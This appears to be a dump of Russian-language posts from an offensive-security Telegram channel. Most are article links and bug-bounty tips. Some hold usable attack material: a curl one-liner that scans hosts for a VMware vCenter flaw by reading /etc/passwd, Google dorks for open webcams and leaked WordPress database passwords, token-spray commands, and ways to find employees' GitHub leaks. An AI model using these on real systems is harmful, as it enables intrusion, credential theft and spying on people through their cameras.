Эксплуатация SQL-инъекции в токене авторизации
В данной статье вы увидите пример уязвимости из за забытой валидации закодированных значений и последующую эксплуатацию SQL инъекцию в токене авторизации.
➖ https://telegra.ph/EHkspluataciya-SQL-inekcii-v-tokene-avtorizacii-12-11
В данной статье вы увидите пример уязвимости из за забытой валидации закодированных значений и последующую эксплуатацию SQL инъекцию в токене авторизации.
➖ https://telegra.ph/EHkspluataciya-SQL-inekcii-v-tokene-avtorizacii-12-11
Telegraph
Эксплуатация SQL-инъекции в токене авторизации
Данная статья является переводом и ведётся со слов автора, оригинал тут. Небольшое введение в токены авторизации Токен авторизации генерируется и подписывается серверами и используется для верификации пользователей по уникальным токенам. После успешного входа…
👍3
👺 Лаборатория хакера - авторский канал об информационной безопаности.
Реальные кейсы, OSINT, социальная инженерия, обзоры инструментов с github, гайды по анонимности.
Реальные кейсы, OSINT, социальная инженерия, обзоры инструментов с github, гайды по анонимности.
👍6🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
Juice Jacking – это один из самых инновационных и современных методов взлома таких гаджетов, как смартфоны, которые используют один и тот же USB-шнур для передачи данных и зарядки.
➖https://telegra.ph/CHto-takoe-Juice-Jacking-Pochemu-sleduet-izbegat-obshchestvennyh-USB-portov-02-17
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10👏1
👾 10 приложений для взлома Wi-Fi для Android
В этой статье делимся списком лучших приложений для взлома Wi-Fi для оценки уязвимостей и тестирования на проникновение на Android.
➖ https://telegra.ph/10-prilozhenij-dlya-vzloma-Wi-Fi-dlya-Android-08-14
В этой статье делимся списком лучших приложений для взлома Wi-Fi для оценки уязвимостей и тестирования на проникновение на Android.
➖ https://telegra.ph/10-prilozhenij-dlya-vzloma-Wi-Fi-dlya-Android-08-14
💩22👍4👎1
👾 Актуальные техники взлома WiFi
Универсальный джентльменский набор: ноутбук с «Линуксом» и WiFi-адаптер с интерфейсом USB (их еще называют донглами). Можно использовать и смартфон (см. ссылку выше), но для некоторых атак банально требуется второй USB-порт. Годится даже ноутбук без установленной ОС и вообще без накопителя.
https://bookflow.ru/aktualnye-tehniki-vzloma-wifi/
Универсальный джентльменский набор: ноутбук с «Линуксом» и WiFi-адаптер с интерфейсом USB (их еще называют донглами). Можно использовать и смартфон (см. ссылку выше), но для некоторых атак банально требуется второй USB-порт. Годится даже ноутбук без установленной ОС и вообще без накопителя.
https://bookflow.ru/aktualnye-tehniki-vzloma-wifi/
👍18😁2
Автор книги проникает в тайны мрачного и опасного мира "подпольного Интернета" - "Даркнета". Именно здесь рождаются самые радикальные идеи современности, а запрещенные законом услуги и товары без проблем приобретаются за крипто-валюту. Анонимность, терроризм, секретные документы, ставки на смерть знаменитостей - только малая часть того, о чем беспристрастно и честно рассказывает в своей книге Джейми Бартлетт.
Скачать: здесь
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍1👎1🔥1😁1🤔1🤬1
⚡️ В Telegram появился первый архив нейросетей — Пакет Нейросетей
Внутри доступны ИИ под любые задачи: для образования, работы, развлечений и творчества.
Например:
• 12 нейросетей в одном посте (SMM, дизайн, таргет, CEO, программирование и даже генератор Reels'ов для Инсты)
• Первый в мире конструктор нейросетей (да, вы можете создать свою по запросу)
• И даже Dream Interpreter AI, визуализирующий ваши сны.
Обновления, анонсы новых проектов и всё-всё про нейросети тоже здесь.
Подписывайтесь!
Внутри доступны ИИ под любые задачи: для образования, работы, развлечений и творчества.
Например:
• 12 нейросетей в одном посте (SMM, дизайн, таргет, CEO, программирование и даже генератор Reels'ов для Инсты)
• Первый в мире конструктор нейросетей (да, вы можете создать свою по запросу)
• И даже Dream Interpreter AI, визуализирующий ваши сны.
Обновления, анонсы новых проектов и всё-всё про нейросети тоже здесь.
Подписывайтесь!
👍5😁2
У большинства API есть конечная точка для создания, удаления, обновления и чтения объекта или группы объектов.
Если вы видите:
DELETE /api/item/32 (удаление)
То попробуйте:POST /api/item (создание)
GET /api/item/33 (чтение)
PUT /api/item/33 (обновление)
Затем протестируйте каждый из них на IDOR, поочередно проверяя аутентификацию и уровни доступа к различным объектам. Методологическое тестирование - лучший способ взломать API.Иногда тестирование API усложняется тем, что мы можем не знать нужные для запроса поля или параметры. Однако есть способы найти их, например: если вы знаете поля для GET, вы так же можете отправить и PUT, изменив некоторые значения.
Кроме того, есть инструменты, такие как Arjun, которые могут находить параметры, а иногда и сами API просто возвращают сообщения об ошибках, когда какой-то из параметров отсутствует.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤🔥2
В этой статье представлен взлом веб-приложения с большим количеством пользователей.
➖ https://telegra.ph/Krazha-informacii-millionov-lyudej-12-22
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5😢2
Топ 7 скриптов для сканера NMAP
🔗Dns — brute.nse
🔗Traceroute — отображает географическое местоположение цели.
🔗firewalk.nse — этот скрипт пытается узнать правила брандмауэра.
🔗Http-sitemap-generator.nse — Паук вэб-сервера который отображает структуру сайта, файлы и каталоги.
🔗HTTP-methods.nse — определяет какие параметры поддерживаются HTTP-сервером, отправив запрос OPTIONS. Он проверяет те методы, которые не указаны в заголовках OPTIONS, и видит, реализованы ли они.
🔗Whois-domain.nse — получает информацию о доменном имени цели.
🔗Shodan-api.nse — этот скрипт попросит API ключик для поисковика SHODAN. Выдаст всю информацию о хосте, которая имеется в SHODAN-e
#usefl
🔗Dns — brute.nse
🔗Traceroute — отображает географическое местоположение цели.
🔗firewalk.nse — этот скрипт пытается узнать правила брандмауэра.
🔗Http-sitemap-generator.nse — Паук вэб-сервера который отображает структуру сайта, файлы и каталоги.
🔗HTTP-methods.nse — определяет какие параметры поддерживаются HTTP-сервером, отправив запрос OPTIONS. Он проверяет те методы, которые не указаны в заголовках OPTIONS, и видит, реализованы ли они.
🔗Whois-domain.nse — получает информацию о доменном имени цели.
🔗Shodan-api.nse — этот скрипт попросит API ключик для поисковика SHODAN. Выдаст всю информацию о хосте, которая имеется в SHODAN-e
#usefl
👍16❤3
В этой статье мы рассмотрим 20 лучших инструментов для хакинга на Kali Linux. Это подборка средств для аудита и взлома беспроводных сетей, проверки уязвимостей и разведки.
#tools #kali
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤2
🇪🇺 Списки слов для фаззинга сайтов на разных языках
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
💬 Infosec Wordlists
💬 Dirbuster Spanish
💬 Bip Spanish
💬 Türkçe Wordlist
💬 krypt0n wordlists
💬 Combined-Wordlists
💬 Common Web Managers Fuzz Wordlists
💬 Cracking French passwords
#fuzz #wordlist
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
#fuzz #wordlist
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤2👏1
Представленный ниже репозиторий содержит подборку видео по тестированию веб-приложений на различные уязвимости. Для удобства, содержимое разбито на категории, в зависимости от типа атак и уязвимостей.
#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.
Для поиска уязвимых хостов можно использовать однострочник:
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
Дорк, который можно использовать для поиска в Shodan:http.title:"ID_VC_Welcome"
Для поиска в Zoomeye:app:"VMware vCenter"
#LFI #SSRF #XSSPlease open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1👏1🤔1
🔬 Поиск внутренних служб в файлах JavaScript
Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в
Осмотрите содержимое этих файлов по ключевым словам
#SSRF #JS
Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в
main.js или app.js.Осмотрите содержимое этих файлов по ключевым словам
localhost, 127.0.0.1, host, port, и т.д., и вы можете найти скрытые внутренние ресурсы, к которым можно получить доступ через SSRF.#SSRF #JS
👍4🥰1
Обход регистрации, захват аккаунта любого пользователя и выполнение действий от его имени с помощью изменений в своем личном кабинете.
#ATO
Please open Telegram to view this post
VIEW IN TELEGRAM
📚 Небольшая подборка онлайн лаб от Hackxpert
Ниже представлена подборка лабораторий для практики поиска различных уязвимостей:
💬 Reflected XSS
💬 Stored XSS
💬 JWT
💬 RFI
💬 LFI
💬 Обход Captcha
💬 Обход панели входа админа
💬 Open redirects
#web #lab
Ниже представлена подборка лабораторий для практики поиска различных уязвимостей:
#web #lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👎9❤4🤔1
Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:
allintitle: "Network Camera NetworkCamera"
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live View / - AXIS"
intitle:"LiveView / - AXIS" | inurl:view/view.shtml
intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp
inurl:axis-cgi/jpg
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view.shtml
inurl:/view/index.shtml
"my webcamXP server!"
#DorkingPlease open Telegram to view this post
VIEW IN TELEGRAM
👍16
1.- Оставлять настройки по умолчанию.Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:
2.- Допускать отсутствия контроля над публичным контентом и политиками.
"define('DB_USER'," "define('DB_PASSWORD'," ext:txt
#WPPlease open Telegram to view this post
VIEW IN TELEGRAM
👍10💘1
При пентесте сайтов мы зачастую ищем утечки в различных местах, включая GitHub, JS-файлы, HTTP-ответы, исходные коды и других местах.
В результате, находится множество ключей и токенов. Если мы знаем к чему относится ключ, то можем поискать способы его эксплуатации в репозитории KeyHacks.
Однако, бывают случаи, когда мы не знаем действительны ли найденные токены / ключи или к какой службе они принадлежат? Одним из способов определить это является атака Token Spray.
По сути, в этой атаке мы берём найденный токен и пытаемся использовать его во всех подряд общеизвестных службах. Если где то сработает, то мы соответственно узнаем принадлежность этого ключа.
Но так как вручную делать это долго и не интересно, мы можем использовать новые шаблоны в Nuclei (не забудьте обновиться). Для их использования достаточно выполнить:
nuclei -t ~/nuclei-templates/token-spray -var token=XXX_TOKEN_XXX
Или сохраните все токены в файл и выполните:nuclei -t ~/nuclei-templates/token-spray -var token=token_list.txt
#ReconPlease open Telegram to view this post
VIEW IN TELEGRAM
👍4
1. Что вы делаете в первую очередь, когда выполняете GitHub Dorking? Вы находите страницу своей цели на Github.
2. В 50% случаев не найдете утечек на их главной странице GitHub, но есть ли другие страницы, на которых можно попробовать найти что-то?
Ответ - Да! Если вы перейдёте на GitHub своей цели и прокрутите вниз, то увидите вкладку «People». Это сотрудники, которые официально работают с вашей целью.
3. Теперь из вкладки «People» перейдите на страницу любого сотрудника. Всех сотрудников, упомянутых на вкладке «People» также можно проверить с помощью дорков Github для поиска конфиденциальной информации, относящейся к нашей цели. Таким образом, наша поверхность атаки становится значительно выше.
Однако помните, что у этих сотрудников есть иная деятельность, нежели работа на исследуемую вами компанию, а это значит, что некоторые конфиденциальные утечки могут относиться к другим проектам, а не к вашей цели.
4. Иногда вы не можете найти утечки по сотрудникам на вкладке «People», не волнуйтесь, есть еще кое-что, что поможет вам увеличить поверхность атаки!
Пробуем найти сотрудников извне. Например, с помощью дорка в гугл:
site:linkedin.com intext:"software engineer at название_компании"
Искать можно не только на LinkedIn. Думаю вы поняли основной принцип. Так вы найдете сотрудников, которые работают на вашу целевую компанию, но все еще не указаны на вкладке «People». Почему?Может быть, потому что они должны храниться в секрете, и они публикуют конфиденциальные материалы... Никогда не угадаешь.
Теперь, когда вы нашли еще несколько сотрудников, нужно найти их страницы на Github. Обычно у всех разработчиков программного обеспечения есть страница на GitHub.
Чтобы найти ее, посмотрите в описание профиля или используйте этот гугл-дорк:
site:github.com intext:тут_ник_сотрудника
Или просто напишите в поиске:github тут_ник_сотрудника
#GitHub #DorkPlease open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2